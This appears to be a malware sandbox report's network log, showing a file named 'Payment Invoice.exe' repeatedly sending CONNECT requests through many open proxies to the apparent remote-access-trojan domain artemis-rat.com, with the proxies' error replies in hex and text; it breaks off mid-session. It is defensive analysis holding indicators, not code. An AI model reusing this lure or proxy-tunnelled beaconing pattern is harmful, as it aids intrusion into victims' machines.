                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                412192.168.2.450612135.148.10.161515077076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.153568029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.183267117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                413192.168.2.451016199.102.104.7041457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.153789043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                414192.168.2.451326172.67.181.147807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.175628901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.329859018 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                415192.168.2.451140112.30.155.83127927076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.176311970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.448566914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.714539051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                416192.168.2.451331104.17.132.79807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.176492929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.330929041 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                417192.168.2.45126369.61.200.104361817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.176707983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                418192.168.2.451308162.223.116.75807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.176745892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.401586056 CET805INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                Content-Length: 613
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                419192.168.2.451338104.16.106.234807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.177017927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.331938982 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                420192.168.2.451265194.247.173.1780807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.177170992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                421192.168.2.450518103.105.76.21490907076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.177325964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.183268070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                422192.168.2.451349172.67.36.21807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.177469969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.331650972 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                423192.168.2.450455102.130.125.86807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.177530050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214420080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.215338945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.214787960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.214582920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.007549047 CET536INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:40 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 613
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                                                Mar 11, 2024 16:15:41.007615089 CET269INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                                                Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                424192.168.2.45063151.158.96.66163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.178373098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214428902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.215323925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.214759111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.162298918 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                425192.168.2.4513435.78.65.91807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.178524017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.193737984 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                                                                Content-Type: text/html
                                                                Connection: close
                                                                Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                                                                Data Ascii: Backend not available


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                426192.168.2.451366104.20.89.77807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.178724051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.333317995 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                427192.168.2.45128437.235.48.19807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.178774118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                428192.168.2.450761207.244.255.174197707076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.179637909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214502096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.215344906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
